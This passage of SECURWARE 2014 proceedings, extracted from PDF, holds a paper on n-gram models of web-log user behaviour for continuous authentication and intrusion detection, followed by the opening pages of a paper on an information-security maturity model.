SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
N-Gram-Based User Behavioral Model
for Continuous User Authentication
Leslie Milton, Bryan Robbins, and Atif Memon,
Department of Computer Science,
University of Maryland, College Park, MD, USA
{lmilton,brobbins,atif}@cs.umd.edu
Abstract—We posit that each of us is unique in our use of
computer systems. It is this uniqueness that we leverage in this
paper to “continuously authenticate users” while they use web
software. We build an n-gram model of each user’s interactions
with software. This probabilistic model essentially captures the
sequences and sub-sequences of user actions, their orderings, and
temporal relationships that make them unique. We therefore have
a model of how each user typically behaves. We then continuously
monitor each user during software operation; large deviations
from “normal behavior” can indicate malicious behavior. We
have implemented our approach in a system called Intruder
Detector (ID) that models user actions as embodied in the web
logs generated in response to the actions. Our experiments on a
large fielded system with web logs of approximately 320 users
show that (1) our model is indeed able to discriminate between
different user types and (2) we are able to successfully identify
deviations from normal behavior.
Keywords–behavioral modeling; continuous authentication;
software security; n-grams.
analysis. It is this footprint that we leverage to “continuously”
authenticate the user. We can construct models of any targeted group of sessions based on n-grams. n-gram models
have performed somewhat surprisingly well in the domain
of language modeling, where researchers have found that a
history of only one to two events is necessary to obtain
optimal predictive capabilities [7]. An n-gram model captures
all sequences and subsequences of a fixed length, N , from
previously observed user input, which allows prediction and
evaluation of future behavior based on frequencies. If we
assume that the event sequences carried out by users of a
software system are analogous to natural language, we would
expect to find similar predictive power in n-gram models of
software event sequences as well. To test the validity of our
approach, we seek to answer the following research questions:
1)
2)
I. I NTRODUCTION
The idea of continuous user authentication (CUA) is not
new. The basic premise of CUA is that conventional user
authentication, usually performed during the initial login session, is insufficient. In conventional authentication, users are
not asked to verify their identity during their session, leaving
the computer system vulnerable to malicious or unintended
use while the user is logged-in. CUA techniques, on the
contrary, monitor, verify, and authenticate users during their
entire session. Functionally, CUA may be considered as one
example of an intrusion detection system (IDS). CUA can
be used to check the state of the system by continuously
montioring user activity and comparing this activity with stored
usage profiles to alert and/or de-authenticate the user when
an intrusion is detected or suspected. IDS takes this one step
further by adding a second line of defense to pinpoint misuse
and initiate proper response [1]. Several studies have used
biometrics to continuously authenticate users by the use of
cognitive fingerprints, eye scans, color of user’s clothing, and
face tracking [2][3][4]. However, many of these techniques
require additional hardware and cost to operate efficiently.
Behavioral modeling addresses these limitations by monitoring
how users interact with the system. Evaluating mouse movement, how a user searches for and selects information, and the
habitual typing rhythm of users are traits used to continuously
observe a user’s behavior [5][6]. Although these approaches
do not require special hardware, most of them do require the
installation of specialized monitoring software.
In this paper, we posit we can obtain a unique behavioral
footprint indicating patterns of use for a specific user or group
of users of a particular web-based software using web log
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
3)
Can we build discriminating user models to determine user types?
Can the model recognize various legitimate users who
are operating in the same user session?
Can usage profiles be used to identify outliers in the
user’s behavior?
Our approach is different from that employed by [3]
because they focus on device usage and delays, mouse tracking, word usage, etc. Our approach also differs from various
biometric approaches [8][4][9][10][11]. We instead focus on a
particular layer of the software. With our approach, we evaluate
web log data generated by users of a web-based system. The
web logs are used to build unique profiles based on a user’s role
within the system. There is no need for additional hardware
since we are using information that is automatically generated
by the system. This process provides a continuous verification
technique with no interaction from the user which not only
improves security but enhances usability of the system.
We feel that our new approach should be used together
with existing authentication mechanisms (e.g., passwords) to
provide an increased level of security demanded by today’s
computing environment. ID is just one more tool in the security
expert’s toolbox.
This work makes the following contributions:
1)
2)
3)
We use n-grams to model the behavior of users while
they interact with web-based software.
We show how keywords are abstracted from web logs
to develop user footprints.
We develop a continuous user authentication technique with the ability to categorize user sessions into
a pre-defined set of roles or potentially finer-grained
user profiles.
43
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The rest of the paper is organized as follows: Section II
provides details of related work. Section III defines the basis
of continuous user authentication and how we model this
activity using n-grams. Section IV describes our pilot study
with experimental results. The conclusion and future work are
discussed in Section V.
II. BACKGROUND & R ELATED W ORK
User authentication serves as a prevention-based method to
protect malicious access of systems. However, if a malicious
user is able to successfully pass the authentication step, there
should be a transparent method to detect their behavior. For
this reason, CUA is used as a second line of defense to
check the state of the system by continuously monitoring
user activity and simultaneously compares this activity with
stored usage profiles to alert and/or de-authenticate the user.
Finally, the IDS takes over and performs misuse and anomaly
detection. The former identifies patterns of known attacks and
the latter detects intrusions by determining whether there is
some deviation from stored normal usage patterns.
Various research studies have explored the use of authentication. Kaminsky et al. address challenges for user
authentication in a global file system [12]. This approach
uses an authentication server to identify users based on local
information. Researchers of cloud computing security methods
have developed implicit authentication to identify a user’s past
behavior data to authenticate mobile devices [13]. These two
studies have one major limitation worth noting. They lack
the ability to continuously monitor user behavior for anomaly
detection.
The realm of CUA has be extensively evaluated with the
use of biometrics to verify user identity through the use
of unique behavioral and/or phyical traits. A study by the
Defense Advanced Research Projects Agency (DARPA) uses a
combination of metrics that include eye scans and keystrokes
to evaluate how the user searches and selects information [3].
In addition, a number of research studies concerning CUA use
one or more hard and soft biometric traits to continuously
authenticate a user. Niinuma et al. propose a CUA framework
to automatically register the color of users’ clothing and their
face as soft biometric traits [4][2]. Results from this study
show that the system is able to successfully authenticate the
user with high tolerance to the user’s posture. Limitations to
these studies exist because of the additional hardware that is
needed to implement this technique which can become costly
if an entire organization uses this feature to authenticate users.
Altinok et al. propose a continuous biometric authentication system that provides an estimate of authentication
certainty at any given time, even in the absence of any
biometric data [10]. However, as the authentication uncertainty
increases over time, system usability decreases. In a similar
study, Kang et al. introduce temporal integration of biometrics
and behavioral features to continuously authenticate users [14].
Similar to the previous biometric studies, additional hardware
is needed.
A face tracking system that uses color and edge information has been used to compute behavioral features. Shen
et al. use mouse dynamics when implementing continuous
user authentication [5]. This technique is used to observe
behavioral features in mouse operations to detect malicious
users. However, there are some existing limitations with this
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
emerging approach. Behavioral variability occurs because of
human or environmental factors. Such changes could possibly
identify the correct user as an impostor.
Our study extends beyond the aforementioned research
studies in that: 1) Instead of using traditional biometric traits,
we explore the possibility of using web log information that is
automatically generated by web applications; 2) Our approach,
integrated into a prototype tool, uses a novel and simple
n-gram language model to capture user behavior; 3) Our
experiments are based on data from users of a government
system who are completing day-to-day tasks.
III. C ONTINUOUS U SER AUTHENTICATION
Our approach to CUA involves building n-gram models of
user activity by observing sequences of user interaction with a
web-based system. Once a model is constructed, we leverage
it for the classification of incoming event sequences. However,
the models are not without problems. While we have been able
to address some challenges with tool support, other challenges
remain. Below we formally define n-gram models, then present
our approach to dealing with fundamental risks of using this
type of model. Finally, we present algorithms for applying this
model to the CUA domain.
A. n-gram Models
In general, n-gram models capture a probability distribution over some domain of events. As a simple example,
imagine that we would like to track the probability of a Sunny
(S) day or Rainy (R) day of weather. To learn the probability
of a Sunny day, we could observe days for some period of
time (e.g., 10 days), and count the number of Sunny days
observed, nSunny. Then, we could assign the likelihood of
. When waking up each
a Sunny day occurring to be nSunny
10
morning, we assume that the probability of a Sunny day is
given by this same fixed rate. Under this interpretation, to find
P (SSSSS) (i.e., five Sunny days in a row), we would simply
solve P (S)5 . We can compute probabilities based on a set
of given observations. The observations can be mapped to a
series of class labels {w0 , w1 , w2 , ..., wn }. Applying the chain
rule of probability theory yields the probability of a sequence
according to some prior context available at each data point:
P (w1n ) = P (w1 )P (w2 |w1 )...P (wn |w1 w2 ...wn−1 )
= P (w1 )P (w2 |w1 )P (w3 |w12 )...P (wn |w1n−1 )
n
Y
P (wk |w1k−1 )
(1)
=
k=1
The probability of P (SSSSS) would be given by
P (S) ∗ P (S|S) ∗ P (S|SS) ∗ ...,
where P (S|S1 ..Sn ) is the probability of S given we have
seen the sequence S1 ..Sn immediately prior to S. When
using this method, however, the number of parameters grow
exponentially with the number of keywords in prior context. In
some cases, we can reasonably apply the Markov assumption,
which assumes that the probability of an event occurring is
dependent only on the current “state” of a system. This state
is defined as a fixed-length context or history, h.
n-gram models, then, are Markov models which use (N −
1) keywords of context to define the current state of the model.
44
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Constructing, or training, an n-gram model requires the ability
to observe example sequences occurring in the domain to be
modeled. To train a model well, we need to observe single
events from sequences in all relevant contexts.
probabilities. The number of possible parameters needed by
the model grows not only according to events observed, but
also exponentially by the history being considered.
For the best possible model, our training phase requires
observation of every possible event in every possible context.
Additionally, we need to observe each context multiple times
to have confidence that parameters are accurate. Without
sufficient training, we may encounter event sequences during
the test phase for which we have no knowledge to provide a
probability estimate.
Others from the natural language domain have addressed
this challenge of insufficient data for n-gram models. A
concept known as smoothing involves saving some probability
mass in an n-gram model’s probability distribution for unseen
events [15]. For the models in this paper, we have chosen to
use the Kneser-Ney smoothing technique [16]. At a high level,
Kneser-Ney involves:
•
•
Figure 1. n-gram model of User1 where n=3
•
Reserving probability mass for unseen events by
reducing all probabilities by a constant discounting
percentage
Estimate missing higher-order conditional probabilities by incorporating the observed frequencies of
lower-order prefixes (a concept known as backoff)
More precisely, combining the frequency of lowerorder n-grams with a concept called a continuation
probability, which estimates the probability that an
event completes an n-gram, to estimate the probability
of event sequences
In statistical analysis, it is sometimes difficult to estimate
P (w|h). Figure 1 represents an n-gram model of User1,
where N=3 and h=2. In this figure, h is a sequence of the
(N − 1) previous keywords. Probabilities are not included
in this example. We deliberately keep the model simple by
showing how current keywords depend on previous keywords
when observing a sequence of actions. Since we are only
concerned with a history of h = 2, the (Start | Profile) state
is captured instead of (Start) as shown in Figure 1. As we
transition from (Start | Profile), we lose Start, but keep Profile
to arrive at the (Profile | Admin) state. Now, every state that
previously came from the Admin state, comes out of every
(<X> | Admin) state. Once we construct an n-gram model in
the training phase, we can use it for analysis of new event
sequences in the test phase. With the Markov assumption
incorporated into our construction of the model, we can apply
the chain rule for conditional probabilities with a history of
length N − 1 to estimate the probability of any event sequence
according to the existing model.
Finally, ID can be configured to incrementally improve its
models during execution. Consider that User1 executes a new
sequence of actions not contained in their n-gram model. This
action can possible occur due to an update of the user interface,
additiional duties added to User1, etc. ID will recognize the
mismatch and ask for re-authentication (e.g., via a password,
supervisoral approval). If this transaction is successful, then the
sequence of actions that was not recognized is added to the
n-gram model, thereby improving its accuracy. When fielded,
we envision ID to be used in a training mode to build baseline
models of all users; an then used in a deployment mode.
C. User Categorization
During the test phase of our experiments, we assign a
probability to a sequence of events. We use binary categorization to judge a sequence as having likely been generated
by a specific model (PASS) or not (FAIL). We introduce a
probability threshold, t, for this pass/fail type of judgment
for a sequence. Any sequence whose probability exceeds this
threshold should be considered as a PASS, +1, and otherwise
considered FAIL, −1.
A decison rule is used to predict the class membership
of a given sequence of behavioral keywords, K. When new
samples are encountered, the following decision rule is used:
P (K, m) > t, then y = +1
(2)
P (K, m) < t, then y = −1
B. Challenges with n-gram Models
Even from a simple example, we see that additional data
typically only stands to improve the reliability of a probabilistic model. With n-gram models, we capture conditional
where P (K, m) is the probability the behavioral keyword
sequence is generated by the mth user’s n-gram model. The
probabilities are estimated using a training set of labeled
data, {(m0 , y0 ), (m1 , y1 ), (m2 , y2 ), ..., (mn , yn )}, where label
yi = ±1 and depends on the class of mi .
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
For a more complete consideration of Kneser-Ney smoothing, the reader is referred to the original reference [16]. For our
purpose, potential risks of applying Kneser-Ney to the domain
of events carried out on software are violations of key features
above. For example, if very few events are being performed
by users, applying a constant discounting to every probability
may save too much probability mass for unseen events. We
will revisit the appropriateness of the model after gathering
evidence in our experiments.
45
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
A more complex scheme that can also be useful for continuous authentication is multi-class categorization [17] [18]. For
effective evaluation, this categorization method requires more
training and test data. Under this decision-making approach,
we can score an input sequence according to one of many
models, and categorize the sequence as belonging to the model
which estimates the highest probability. Therefore,
u = arg max P (K, m)
(3)
m
We use binary categorization by a simple threshold and multiclass categorization by comparing probabilities to translate ngram models’ estimations of sequence probability into decisions. We investigate our ability to make accurate decisions of
various types as supported by these algorithms.
IV. E XPERIMENT
We now describe a set of experiments carried out on real
user data designed to investigate the utility of n-gram models
for CUA. In particular, we investigate the following research
questions:
RQ1: Can we build discriminating user models to determine
user types?
RQ2: Can the model recognize various legitimate users who
are operating in the same user session?
RQ3: Can usage profiles be used to identify outliers in the
user’s behavior?
A. Subject System
We evaluate our proposed approach for CUA on an active
government training support website for the high performance
computing (HPC) community. This site is a repository for
online training material which provides training course registration, course evaluation, information on several domain
specific areas, and is a general source of information for its
community of users.
Figure 2. User Roles.
Each user account has an associated role. As shown in
Figure 2, approximately 3800 users are in the “users” group
which incorporates limited read access as well as the ability to
evaluate and register for courses. These users do not access the
system often. There are additional roles that provide access to
areas of the system that are meant for administrative purposes;
(Admin, Management, Technologist). The most prominent of
these is the Admin role which has access to all areas. These
users interact with the system often. Therefore, while we have
more individual sessions available for the User role, the Admin
role provides more per-user and per-session data. The Admin
role also has the greatest risk for unauthorized use.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
B. Data Collection
Because the system is web-based, access logs capturing
hypertext transfer protocol (HTTP) requests made to the web
server can provide sequences of user events. These logs are
generated by the Tomcat JavaServer Pages (JSP) and servlet
container. We analyzed the web log files for nine months to
get accurate usage data for the system. User activity is largely
based on role (i.e., access level). A user’s role is monitored
and used to verify their identity. This is under the assumption
that users within the same role are likely to perform similar
actions. System trust increases as the user interacts with the
system if no outliers are identified in the CUA user model.
To validate data captured in a user’s session, the following
steps were used for preprocessing [19]:
1)
2)
3)
4)
Data Cleaning: The process of data cleaning is very
important to generate an accurate picture of user
activity when navigating a web application. For web
logs of the subject system, various graphics and
scripts are generated which add several entries to
the log file. However, with our experiements, only
JSP entries show user behavior and are important for
logging purposes. Therefore, we remove all entries
that are not related to user activity.
User Identification: Once the data is clean, the remaining file entries are grouped by individual user.
Each user-id is associated with a role. User-ids are not
continuously captured in the web log file. To solve
this limitation, we check the session-id in a separate
database table to capture unique user-ids.
Session Identification: Session identification is used
to divide user accesses into individual sessions [19].
For the web access log, sessions are clearly identified.
After checking the database for the role of each user,
sessions are then grouped by role.
Keyword Generation: For each relevant JSP entry
in the individual user log, a portion of the string
is captured as a keyword. We are not considering
parameters in this process because user entries would
be too unique to categorize in a model.
When predicting individual user behavior (i.e., fine-grained
approach), we filter the web logs to abstract only those users
who have at least two sessions of activity and at least 80
keywords to ensure we have enough keyword data. After
applying this filter, 31 users met this criteria and were used
for this study. When predicting user types, 320 users were
identified. In addition, at least two user roles must be present
when predicting user types (i.e., user roles). To maintain the
purity of the evaluation, we separate data into training and test
sets, such that no model should be evaluated on its ability to
classify data which was used during its own training.
C. Multi-class Categorization
For RQ1, we first want to consider whether unique profiles
can indeed be constructed. To evaluate this research question,
we develop models for each user role and use the multiclass categorization approach. Because we have four groups of
users, a random model with no observation would achieve 25%
accuracy in categorizing users. If our models are effectively
capturing unique details about the behavior of users within
roles, we would expect to see much greater overall accuracy
46
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
in categorization. We test the approach by comparing ID’s
recommended category to the actual category of each test
session.
For the purpose of cross-validation, we performed various
data splits for training and test data as seen in Figure 3 (50/50,
60/40, 70/30, 80/20, 90/10) to predict user roles. We reserve
a precentage of sessions based on the data split to represent
the testing set, E, and use the remaining data as the training
set, R, to train an N order n-gram model for the specified
class. We calculate P (K, m) for each sample of keywords
K from E. This represents the probability that the keywords
are generated by the mth users n-gram model. Finally, m
is selected with the highest probability for the behavorial
keyword sequence, P (K, m), and used as the prediction value.
The y-axis, accuracy in Figure 3, shows this value for each data
split.
Figure 3. Prediction accuracy vs. n-gram order.
RQ1 results: Overall, the history order does not play a
significant role. However, we do find that accuracy is highest when N =2 for each data split under evaluation when
correctly categorizing test sequences into roles. Among each
data split tested, the 80/20 data split has the highest accuracy,
80.5%, when N =2. The reported accuracies mark the mean
performance over 10 separate trials, each of which chose
random training data. For the 154 test sessions identified
under this split, ID classified anywhere from 110 to 124
sessions correctly, depending on the sessions randomly chosen
as training data. In most data splits, the accuracy began to
decrease as the model order increased.
Based on these observations, we perform at a much greater
rate of accuracy than a random selection of 25%, suggesting
that at least some unique features of roles are effectively
detected by the models. This shows using the models are both
feasible and appropriate moving forward.
Instead of focusing on the four pre-defined user roles, RQ2
focuses on the ability of n-gram models to capture the behavior
of specific users regardless of role. To evaluate this research
question, we first filter the data under consideration to include
only those users which have at least two sessions and at least
80 total keywords of input to ensure we have enough data to
capture sequences. For the users meeting this criteria, we train
models according to the n-gram approach.
RQ2 results: We achieved an overall accuracy rate of only
46% on the task of correctly categorizing test sequences by
specific users. After filtering, we were left with only 28 test
sessions. The tool correctly classified anywhere from 11 to
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
13 sessions correctly, depending on the sessions randomly
chosen as training data. As in RQ1, the 46% overall mark
represents the mean performance over 10 separate trials that
were generated using random training data. We achieved our
best results on this data when tuning model length to N =2 and
implementing the 90/10 data split.
Working with so few test and training sessions, we have
very little confidence in our evaluation of user specific profiles.
In the future, we will be required to obtain much more data
per user to effectively consider the construction of user-specific
profiles.
D. Binary Categorization
When addressing RQ3, we want to consider whether the
role-specific profiles constructed as part of RQ1 are capable
of detecting outliers in user behavior. To evaluate this research
question, we use the models from RQ1 independently in a
binary categorization approach, as described in Section III-C.
Because this task uses models independently, we use both
training and test data from the remaining three roles to evaluate
the model’s ability to reject uncharacteristic sequences (i.e,
negative examples). In addition, we use only test data from
the model’s own role to evaluate its ability to accept valid
sequences (i.e., positive examples). Additionally, we would
like to consider the effect of test sequence length (i.e., the
number of keywords in an input sequence) on the performance
of this task.
Finally, we track only a single threshold value for this
task even though sequence length varies. A threshold which
performs well for input sequences of length two would likely
overestimate the threshold for longer lengths. As an alternative,
we adapt the model’s output probability to be an indicator of
entropy, a measure of uncertainty in a system. This gives us
the ability to normalize by the length of the input sequence. By
doing so, we maintain a single threshold value for the binary
classification task.
RQ3 results: Of all three research questions we consider,
RQ3 relates most directly to the CUA goal of ID. Efficient
experimental results are observed when accepting or rejecting
snippets of user sessions based on role. We tested each model
against every available subsequence of user keywords, from
lengths two to nine with a probability threshold of -0.6. We
obtained our best performance on this data when using N =9.
Recall that backoff and smoothing in the model allow for
the assignment of probabilities to a sequence of any length,
regardless of the maximum history considered. Figures 4, 5,
6, and 7 show our findings. Note that accuracy is plotted
separately for positive and negative test samples to analyze the
models ability to reject uncharacteristic sequences and accept
valid sequences.
We summarize the results as follows:
•
•
•
As expected, the length-of-session examples provided
to models significantly affects the ability to correctly
classify the example.
The effect of length was much greater on negative
examples, as failures due to rejecting a positive sample
were rare after lengths greater than four.
The User model performed at a level greater than 90%
on all samples for lengths greater than three.
47
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
•
•
Figure 4. User n-gram model.
Figure 6. Technologist n-gram model.
Figure 5. Admin n-gram model.
Figure 7. Management n-gram model.
The Management model eventually achieved performance of 92%, though this took sessions of length
nine.
The Admin and Management models averaged 71%
and 68% on negative examples, respectively, even at
the maximum considered length of nine.
From these results, we can conclude that binary categorization proves to be much more effective than a random
baseline at detecting uncharacteristic user behavior. For two of
the four models considered, we achieved above 90% correct
identification of negative samples and 100% correct acceptance of positive samples. In particular, the finding that User
sessions can easily be protected against uncharacteristic usage
is promising. Due to a large data set and elevated level of
privileges for tasks, we expected the Admin user role to have
one of the strongest models but this was not observed. In
general, n-gram models seem much better suited for binary
categorization tasks such as this one, especially given limited
amounts of available data. In the future, perhaps multi-class
categorization problems could be restated as a series of binary
decisions.
Alternatively, the improvement in performance could be
due to the use of shorter sessions which are less likely to
contain unseen events. In this case, we rely on the validity of
smoothing assumptions for accurate probability estimation. In
the future, we will consider the effect of test example length
on other tasks performed by ID as well.
V. C ONCLUSIONS & F UTURE W ORK
In this paper, we propose a continuous probabilistic authentication approach to model the behavior of users that interact
with web-based software. A significant advantage of this mode
of authentication is that it can be employed throughout the
period of interaction, and hence, provide a natural way to
continuously authenticate users. We have built a prototype, Intruder Detector, which keeps track of user actions, builds user
profiles based on the n-gram language model and use these
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
models to discriminate between user roles, and potentially
finer-grained user profiles. Results show that Intruder Detector
achieves 80.5% accuracy in user role classification tasks and
nearly perfect accuracy when identifying categorization errors.
Although our pilot study has shown promising results,
much work remains. In the immediate short term, we intend
to work with a larger data set and compare various smoothing
techniques. This will help improved the accuracy of RQ2 to
correctly categorizing individual users. Capturing more data
will help to better understand the characteristics of good, welltrained user models. We also plan to work out the details of
fielding ID and evaluate two modes of operation: training
in which models get built; and deployment in which the
models get used for CUA. Afterwards, we will evaluate an
alternative fielding strategy, one in which we have another
level of authentication, using conventional means, in case ID
identifies an intruder; this strategy will allow the models to
iteratively get better (i.e., more accurate) with time.
ACKNOWLEDGMENT
This material is based on research sponsored by DARPA
under agreement number FA8750-14-2-0039. The U.S. Government is authorized to reproduce and distribute reprints for
Governmental purposes notwithstanding any copyright notation thereon.
R EFERENCES
J. Liu, F. Yu, C.-H. Lung, and H. Tang, “Optimal combined intrusion
detection and biometric-based continuous authentication in high security
mobile ad hoc networks,” Wireless Communications, IEEE Transactions
on, vol. 8, no. 2, Feb 2009, pp. 806–815.
[2] K. Niinuma, U. Park, and A. K. Jain, “Soft biometric traits
for continuous user authentication,” Trans. Info. For. Sec.,
vol. 5, no. 4, Dec. 2010, pp. 771–780. [Online]. Available:
http://dx.doi.org/10.1109/TIFS.2010.2075927
[3] R. P. Guidorizzi, “Security: Active authentication,” IT Professional,
vol. 15, no. 4, 2013, pp. 4–7.
[4] K. Niinuma, A. K. Jain, J. B. Kumar, S. Prabhakar, and A. A. Ross,
“Continuous user authentication using temporal information,” SPIE.,
vol. 7667, 2010.
[1]
48
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
C. Shen, Z. Cai, and X. Guan, “Continuous authentication for mouse
dynamics: A pattern-growth approach,” in Proceedings of the 2012
42Nd Annual IEEE/IFIP International Conference on Dependable
Systems and Networks (DSN), ser. DSN ’12. Washington, DC,
USA: IEEE Computer Society, 2012, pp. 1–12. [Online]. Available:
http://dl.acm.org/citation.cfm?id=2354410.2355184
F. Monrose and A. D. Rubin, “Keystroke dynamics as a biometric for
authentication,” Future Gener. Comput. Syst., vol. 16, no. 4, Feb. 2000,
pp. 351–359. [Online]. Available: http://dx.doi.org/10.1016/S0167739X(99)00059-X
D. Jurafsky and J. Martin, Speech and Language Processing: An Introduction to Natural Language Processing, Computational Linguistics,
and Speech Recognition, 2nd ed. Pearson Prentice Hall, 2009.
S. Zhang, R. Janakiraman, T. Sim, and S. Kumar, “Continuous
verification using multimodal biometrics,” in Proceedings of the 2006
International Conference on Advances in Biometrics, ser. ICB’06.
Berlin, Heidelberg: Springer-Verlag, 2006, pp. 562–570. [Online].
Available: http://dx.doi.org/10.1007/11608288 75
A. Azzini and S. Marrara, “Impostor users discovery using a
multimodal biometric continuous authentication fuzzy system,” in
Proceedings of the 12th International Conference on Knowledge-Based
Intelligent Information and Engineering Systems, Part II, ser. KES ’08.
Berlin, Heidelberg: Springer-Verlag, 2008, pp. 371–378. [Online].
Available: http://dx.doi.org/10.1007/978-3-540-85565-1 47
A. Altinok and M. Turk, “Temporal integration for continuous multimodal biometrics,” in In Multimodal User Authentication, 03, pp. 11–
12.
A. J. Klosterman and G. R. Ganger, “Secure continuous biometricenhanced authentication,” Tech. Rep., 2000.
M. Kaminsky, G. Savvides, D. Mazieres, and M. F. Kaashoek,
“Decentralized user authentication in a global file system,” in
Proceedings of the Nineteenth ACM Symposium on Operating Systems
Principles, ser. SOSP ’03. New York, NY, USA: ACM, 2003, pp.
60–73. [Online]. Available: http://doi.acm.org/10.1145/945445.945452
R. Chow, M. Jakobsson et al., “Authentication in the clouds: A
framework and its application to mobile users,” in Proceedings of the
2010 ACM Workshop on Cloud Computing Security Workshop, ser.
CCSW ’10. New York, NY, USA: ACM, 2010, pp. 1–6. [Online].
Available: http://doi.acm.org/10.1145/1866835.1866837
H. B. Kang and M. H. Ju, “Multi-modal feature integration for secure
authentication,” in Proceedings of the 2006 International Conference
on Intelligent Computing - Volume Part I, ser. ICIC’06. Berlin,
Heidelberg: Springer-Verlag, 2006, pp. 1191–1200. [Online]. Available:
http://dx.doi.org/10.1007/11816157 148
S. F. Chen and J. Goodman, “An empirical study of smoothing
techniques for language modeling,” in Proceedings of the 34th annual
meeting on Association for Computational Linguistics, 1996, pp. 310–
318.
R. Kneser and H. Ney, “Improved backing-off for m-gram language
modeling,” in Acoustics, Speech, and Signal Processing, 1995. ICASSP95., 1995 International Conference on, vol. 1, 1995, pp. 181–184 vol.1.
Y. Liu, Z. You, and L. Cao, “A novel and quick svm-based multi-class
classifier,” Pattern Recogn., vol. 39, no. 11, Nov. 2006, pp. 2258–2264.
[Online]. Available: http://dx.doi.org/10.1016/j.patcog.2006.05.034
P. Honeine, Z. Noumir, and C. Richard, “Multiclass classification
machines with the complexity of a single binary classifier,” Signal
Processing, vol. 93, no. 5, 2013, pp. 1013 – 1026. [Online]. Available:
http://www.sciencedirect.com/science/article/pii/S0165168412004045
R. Cooley, B. Mobasher, and J. Srivastava, “Data preparation for
mining world wide web browsing patterns,” KNOWLEDGE AND
INFORMATION SYSTEMS, vol. 1, 1999, pp. 5–32.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
49
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
GAIA-MLIS: A Maturity Model for Information Security
Roger W. Coelho
Gilberto Fernandes Jr.
Mario Lemes Proença Jr.
Computer Science Department
State University of Londrina, UEL
Londrina, Brazil
rogercoelho04@uol.com.br
Computer Science Department
State University of Londrina, UEL
Londrina, Brazil
gil.fernandes6@gmail.com
Computer Science Department
State University of Londrina, UEL
Londrina, Brazil
proenca@uel.br
Abstract— Information security management has become one
of the most important areas for organizations in recent times.
This is due to the increased need to protect data which is, in
turn, one of the most important assets for any organization
nowadays. Managing security risks is an ardous task which
requires investments in support and technology management
in order to succeed. Thus, there is great demand for a tool
which is able to demonstrate the maturity level of an
information security system, with the main objective of
identifying key strengths and weaknesses in IT processes
utilized by an organization. The GAIA-MILS model presented
in this article has, as its main goal, to analyze the maturity level
of an organization’s information security system and supply
them with key data on how they can improve. This proposed
model presents descriptions of each different level in the areas
of hardware, software, people and facilities. Its main objective
is to diagnose and aid in the improvement of any identified
weaknesses in the management of each specific area.
Keywords - Maturity Level; Information Security; IT
Governance.
I.
INTRODUCTION
In the business world, asset information is seen as one of
the most important within organizations. There are three
distinct types which are considered most valuable: people,
facilities and information [1]. Thus, security risk
management is usually based on technology support and
investment management [2].
The risks posed by information systems are not only
complex but also difficult to quantify, since the damage can
directly impact on the goal of the organization [5].
Organizations and service providers must develop
protection tools in order to avoid misappropriation of user
data. Thus, security threats such as viruses, worms, denial of
service, submission of data by third parties, among others,
cause concern for both users and service providers [3].
The Governance of Information Technology, aligned
with good information security, is vital to the organization
and service providers, since its credibility and reliability are
tested every day. In addition, assessment methods can
provide prescriptive data on how to improve the company
management, as well as define who is responsible for the
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
information and how it will be transmitted or maintained
[15].
In conjunction with IT (Information Technology)
governance, information security means keeping three main
pillars: confidentiality, as information must be accessible
only to authorized persons; integrity, to ensure that
information is entirely transmitted; and usability, to
guarantee authorized personnel access to the information
and related resources when needed [4].
Organizations should assess their level of safety maturity
through a formal model and utilize it as a parameter to
measure the security risk. The model GAIA Maturity Level
Information Security (GAIA-MLIS) aims to assess the
maturity level of information security used in the evaluated
network. For the purpose of implementing improvements in
these processes, GAIA-MLIS enables companies to identify
weaknesses in security processes, like hardware, software,
human resources, facilities and information.
This article is organized as follows: Secion II deals with
IT Governance and Information Security; Section III
presents GAIA-MLIS Maturity Model Information Security;
Section IV shows tests and results; and finally, Section V
concludes the article.
II.
IT GOVERNANCE AND SECURITY OF
INFORMATION
Technological infrastructure is critical to daily
operations within an organization and should be managed
with defined processes. Accordingly, IT governance should
focus on risk and resource management and strategic
alignment to ensure that the technology and the active
information adopt corporate objectives, maximizing benefits
and opportunities as a means of acquiring competitive
advantage [1].
IT governance has emerged as an auxiliary tool for
managers, both in IT and other sectors of an organization, to
help them comprehend the importance of all sectors working
in alignment and, therefore more efficiently, in order to
achieve their common goal [6]. IT is a strategic sector for an
organization and it aids in revenue generation, contributing
to the development of new technologies and technical
support for other sectors. The Chief Information Officer
50
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
(CIO) must establish an effective governance, to improve
the performance and success of the organization, supporting
business strategies and plan of action [5].
Effective governance requires that the managers set
standards and regulations for information assets.
Information security is not only restricted to minimizing
risks and failures, but it also affects the reputation of the
organization, depending on how it acts on disaster recovery.
The recovery organization defines the values and access
permission information, thus everyone involved, customers,
employees, among others, come to rely on the credibility of
the organization [7]. Almost all organizations have their
automated processes in their information systems, in order
to ensure the efficient delivery of their services [17].
It is know that security is a method to protect the
information against various types of threats ensuring
continuity of business, higher return on investment and
minimized risk. It is also the practice of ensuring the
information can only be read, heard, altered or transmitted
by people or organizations that have the right to do so. The
main goals are confidentiality, integrity and availability.
Confidentiality is the protection against theft and espionage.
Integrity is the protection against non-authorized changes.
Availability is the automated and secure access to the
information users [12] [18].
Information security is achieved by means of an
appropriate set of controls, which might include, policies,
procedures, software, hardware, among others. All these
controls need to be established, implemented, monitored,
reviewed and improved in order to achieve the company’s
business targets. Likewise, security metrics have attracted
the attention of the community for many years. However,
the field is still lacking a formal model [16].
It is necessary that these controls are carried out in
conjunction with security metrics to measure and compare
the value of the security provided by different systems and
settings [8].
